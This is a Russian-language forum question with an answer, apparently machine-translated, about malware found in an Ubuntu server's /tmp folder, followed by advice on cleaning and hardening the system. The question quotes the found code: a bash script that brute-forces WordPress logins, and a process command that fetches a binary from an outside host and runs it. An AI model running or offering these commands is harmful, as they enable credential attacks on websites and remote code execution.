У меня есть необычные файлы в папке Ubuntu TMP. Может ли кто-нибудь пролить свет на это и каковы могут быть мои шаги по профилактике.

В папке temp есть 2 файла с именем Script и URL

Когда я нано файл сценария :

#!/bin/bash
if curl -s  --max-time 7 -d "log=$1" -d "pwd=$2" -d "wp-submit=Log+In" 
"$3"/wp-login.php  -i |grep -a "path=/wp-content/pl$

then
echo $3 $1 $2
fi

и нано URL показывает не читаемые результаты

Далее по команде HTOP выполняется следующий вредоносный процесс

\par 2 S  0.0  0.0  0:00.00 sh -c cd /tmp;rm -rf url*;cd /tmp;rm -rf url;curl -O socks5.so/url;chmod 777 url;./url
\par 4 S  0.0  0.0  0:00.00 ./url

Когда запросите идентификатор процесса:

#ls -al /proc/12186/exe

Output is:
someuser someuser 0 Jun 17 06:06 /proc/12186/exe -> /bin/dash

когда я удаляю файлы в папке TEMP, она продолжает восстанавливаться, как я могу это остановить.Я полагаю, что он использует мой сервер для атаки на установленные веб-сайты.

1 ответ1

0

Вы были извинены. От этого может быть чрезвычайно трудно избавиться.

Вы можете скачать пакет rkhunter, обновить его,

    rkhunter --update

отключите компьютер от сети, запустите его:

    rkhunter -c

Если он сообщает о наличии руткита, ваш лучший шанс - переустановить ОС. Фактически, наличие руткита в целом указывает на опытного и хорошо оснащенного противника, сражаться с которым можно, но только с большим количеством времени и технической компетентностью, что намного больше, чем может предложить формат этого форума.

Если вместо этого нет следов руткита, то вы можете начать (ваш компьютер еще не подключен к сети), очистив ваш компьютер следующим образом:

  1. Поменяйте ваш пароль;
  2. отредактируйте файл sudo (с помощью visudo) и избавьтесь от всех пользователей, которые не являются системными пользователями, или вы сами.
  3. найдите (возможно) других пользователей с помощью оболочки входа в /etc /passwd и удалите их.
  4. удалите домашние каталоги этих пользователей.
  5. полностью отключить демон ssh.
  6. Установите часы с помощью inotifywait для общих системных файлов, таких как /var /log /wtmp.
  7. настройте iptables для регистрации всех попыток подключения и блокировки всего трафика подключения, за исключением трафика на нестандартном порту для ssh и связанного с существующими подключениями, инициированными вами.

Затем, когда вы вернетесь в режим онлайн, загрузите fail2ban без его установки, выйдите из сети, запустите демон ssh, установите fail2ban.

Теперь измените ваш ssh, чтобы использовать только криптографические ключи, чтобы запретить входы в систему root и пароли. Теперь вы можете вернуться в Интернет и прочитать разумную страницу блога о том, как обезопасить свой Linux-компьютер.

Всё ещё ищете ответ? Посмотрите другие вопросы с метками .